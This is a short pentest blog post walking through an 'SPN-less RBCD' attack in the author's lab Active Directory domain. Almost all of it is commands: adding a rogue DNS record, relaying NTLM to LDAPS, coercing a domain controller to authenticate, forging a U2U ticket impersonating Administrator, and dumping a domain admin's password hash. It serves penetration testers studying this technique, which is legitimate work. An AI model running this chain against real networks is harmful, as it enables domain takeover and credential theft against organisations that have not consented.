Today’s prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation).  Here are the key steps:

Lets use my lab of as an example and say that TT-DC02 is where Webdav is enabled.

Add a DNS record that points to your testing box (I think this is required so the victim systems consider you to be in the “Trusted Zone”): -u 'tangent\7MinSec' -p 'MySuperSecurePassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

Setup the relay to TT-DC02: -smb2support -t ldaps:// --delegate-access --escalate-user 7minsec

Coerce TT-DC01 to auth to your Kali box:

coercer coerce -u 7MinSec -p 'MySuperSecurePassword' -t TT-DC01 -l ROGUE-DNS-RECORD --auth-type http

If it worked your ntlmrelay window should say something like 7minsec can now impersonate users on TT-DC01$ via S4U2Proxy

Then I followed to perform SPN-less RBCD: -hashes :$(pypykatz crypto nt 'MySuperSecurePassword')

Take note of the session key from this command: 7minsec.ccache | grep 'Ticket Session Key'

Change the account password: -newhashes :TICKET-SESSION-KEY-GOES-HERE

Perform U2U:

KRB5CCNAME=7minsec.ccache -u2u -impersonate Administrator -spn host/tt-dc01 -k -no-pass

Profit! In this example, stealing a domain admin (Tommy’s) hash:

KRB5CCNAME='tt-dc01$@host_tt-dc01@TANGENT.TOWN.ccache' -k -no-pass @tt-dc01 -just-dc-user tommy

Written by: Brian Johnson

Share on socials: